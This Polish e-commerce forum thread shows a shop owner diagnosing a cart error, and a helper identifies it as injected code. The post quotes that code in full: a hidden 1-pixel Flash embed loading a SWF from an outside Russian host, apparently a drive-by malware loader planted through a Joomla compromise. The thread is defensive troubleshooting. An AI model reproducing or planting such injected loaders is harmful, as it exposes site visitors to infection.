skrzypek1364 Posted July 22, 2014 Share Posted July 22, 2014 Witam. Ustawiłem swój pierwszy sklepik (oczywiście z pomocą kilku osób z tego forum, za co im dziękuję ), wszystko śmigało aż miło, ale ostatnio pojawił się dziwny błąd. Mianowicie, przy próbie dodania czegoś do koszyka wyskakuje okienko z błędem: Impossible to add the product to the cart.textStatus: 'parsererror'errorThrown: 'SyntaxError: JSON.parse: unexpected character at line 1 column 1 of the JSON data'responseText: itd...... Wcześniej tego nie było. Produkt prawidłowo dodaje się do koszyka, no, ale to brzydko troszkę wygląda Możecie pomóc? sklep to: biowroclaw.pl Pozdrawiam Link to comment Share on other sites More sharing options...
vekia Posted July 22, 2014 Share Posted July 22, 2014 do twojego sklepu doczepił się jakiś kod <div id="YFxUVaadakXx"> <script type="text/javascript" language="javascript"> function getuser(){ return navigator.userAgent;} function putnothing(id){document.getElementById(id).outerHTML = "";} function putme(id,data){document.getElementById(""+id+"").outerHTML = data;} function getactive(){if ("ActiveXObject" in window && navigator.userAgent.match(/(msie)/i)!==null) { return 0; } return 1;} </script> <object type="application/x-shockwave-flash" data="http://tds.progadaniya.ru/swf.swf?myid=YFxUVaadakXx" width="1px" height="1px"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="YFxUVaadakXx" /> <param name="movie" value="http://tds.progadaniya.ru/swf.swf?myid=YFxUVaadakXx"/> <embed src="http://tds.progadaniya.ru/swf.swf?myid=YFxUVaadakXx" width="1" height="1"> </embed> </object></div i to on sprawia problem jesteś wstanie powiedzieć, co to za "cudo" ? Link to comment Share on other sites More sharing options...
skrzypek1364 Posted July 22, 2014 Author Share Posted July 22, 2014 Nie mam bladego pojęcia. Link to comment Share on other sites More sharing options...
skrzypek1364 Posted July 22, 2014 Author Share Posted July 22, 2014 W którym miejscu to "cudo" usunąć Link to comment Share on other sites More sharing options...
vekia Posted July 22, 2014 Share Posted July 22, 2014 trudno powiedzieć skąd to się wzięło masz opcję przeszukania plików aby zlokalizować ten kod? nie chcę nic mówić, ale mi to wygląda na jakiś złośliwy kod Link to comment Share on other sites More sharing options...
skrzypek1364 Posted July 22, 2014 Author Share Posted July 22, 2014 Tak to złośliwy kod coś mi się "wbiło" na serwer i pozmieniało ten kod nie tylko w tej stronie, ale też w kilku innych (joomla). mam gdzieś lukę i teraz mam za zadanie ją znaleźć i unieszkodliwić Z tym już sobie poradziłem, podmieniłem index.php na świeży. Dzięki za pomoc. Link to comment Share on other sites More sharing options...
vekia Posted July 22, 2014 Share Posted July 22, 2014 Tak to złośliwy kod coś mi się "wbiło" na serwer i pozmieniało ten kod nie tylko w tej stronie, ale też w kilku innych (joomla). mam gdzieś lukę i teraz mam za zadanie ją znaleźć i unieszkodliwić już sobie odpowiedziałeś joomla jest dziurawa jak hamak Link to comment Share on other sites More sharing options...
skrzypek1364 Posted July 22, 2014 Author Share Posted July 22, 2014 i pomyśleć że do tej pory robiłem sklepy w virtuemart Ale to chyba dlatego, że nie znałem presty. Szczerze, to nie widzę na razie nic lepszego. Próbowałem ostatnio kilku rozwiązań, bo z joomlą jest zawsze problem i najlepiej sprawdza się presta. Niestety na razie muszę je robić za friko, bo nie można na klientach się uczyć Pozdro Link to comment Share on other sites More sharing options...
Recommended Posts